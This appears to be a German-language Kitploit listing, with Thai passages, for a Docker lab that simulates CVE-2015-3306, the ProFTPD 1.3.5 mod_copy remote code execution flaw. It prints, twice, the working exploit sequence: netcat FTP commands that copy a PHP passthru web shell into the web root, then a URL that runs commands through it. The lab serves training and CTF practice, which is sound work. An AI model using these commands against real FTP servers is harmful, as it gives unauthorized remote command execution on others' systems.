Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2015-3306-Home-Lab — CVE-2015-3306 – ProFTPD – RCE Heim-Labor-Einrichtung (Docker) einfach zu verwenden für Red Teaming oder Penetration Testing | Kitploit
Tools/GitHubGitHub/netw0rk7/cve-2015-3306-home-lab
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungRed TeamingLabs & Praxis
GitHubnetw0rk7/cve-2015-3306-home-lab

CVE-2015-3306-Home-Lab

CVE-2015-3306 – ProFTPD – RCE Heim-Labor-Einrichtung (Docker) einfach zu verwenden für Red Teaming oder Penetration Testing

Repository anzeigen
2vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ENGLISH BELOW

ProFTPD 1.3.5 (mod_copy) — RCE Simulationslabor

CVE20153306

Lab นี้ถูกออกแบบเพื่อจำลองช่องโหว่ CVE-2015-3306 — ProFTPD mod_copy Remote File Copy to RCE
ใช้สำหรับเรียนรู้ Web Shell Injection RCE ผ่านโมดูล mod_copy ของ ProFTPD


Funktionen

  • ProFTPD 1.3.5 แบบ Vulnerable
  • เปิดใช้ mod_copy เต็มรูปแบบ (SITE CPFR / SITE CPTO)
  • รองรับ Anonymous FTP
  • Apache2 + PHP5 สำหรับจำลอง web root /var/www/html
  • ผู้โจมตีสามารถใช้ SITE CPFR/CPTO เพื่อ copy file ไปยัง webroot เพื่อที่จะ trigger RCE
  • ระบบสร้าง อัตโนมัติทุกครั้งที่ container start
flag_RANDOM.txt
  • เป็น Lab สำหรับ CTF / Red Team / Pentest Training

  • Verzeichnisstruktur

    root@kitploit:~
    /etc/proftpd/proftpd.conf
    /usr/local/proftpd/
    /var/www/html/
    /tmp/flag_xxx.txt
    /entrypoint.sh
    

    Verwendung (Container starten)

    root@kitploit:~
    docker build -t sentinel7-proftpd-lab .
    docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab
    

    So testen Sie die Schwachstelle CVE-2015-3306

    root@kitploit:~
    nc <IP> 21
    SITE CPFR /proc/self/cmdline
    SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
    
    SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
    SITE CPTO /var/www/html/webshell.php
    

    Im Browser öffnen:

    root@kitploit:~
    http://<IP>/webshell.php?cmd=<command>
    

    Flag

    Gespeichert unter:

    root@kitploit:~
    /tmp/flag_RANDOM.txt
    

    Deutsche Version — ProFTPD 1.3.5 (mod_copy) RCE Labor

    Dieses Labor simuliert CVE-2015-3306 mit ProFTPD 1.3.5 und mod_copy, was Angreifern ermöglicht, eine ProFTPD mod_copy Remote File Copy to RCE durchzuführen.


    Funktionen

    • Angreifbare ProFTPD 1.3.5 aus dem Quellcode kompiliert
    • mod_copy aktiviert (SITE CPFR + SITE CPTO)
    • Anonymer FTP-Zugriff
    • Apache2 + PHP5 zur Ausführung von Webshells
    • Automatisch generierte flag_RANDOM.txt beim Container-Start
    • Ideal für CTF, Ausbildung und Exploit-Forschung

    Beispiel für den Exploit-Test

    root@kitploit:~
    nc <IP> 21
    SITE CPFR /proc/self/cmdline
    SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
    
    SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
    SITE CPTO /var/www/html/webshell.php
    

    Dann ausführen:

    root@kitploit:~
    http://<IP>/webshell.php?cmd=<command>
    

    Flag-Position

    root@kitploit:~
    /tmp/flag_RANDOM.txt
    

    Haftungsausschluss

    Nur für Bildungszwecke und autorisierte Penetrationstests.

    Tool herunterladen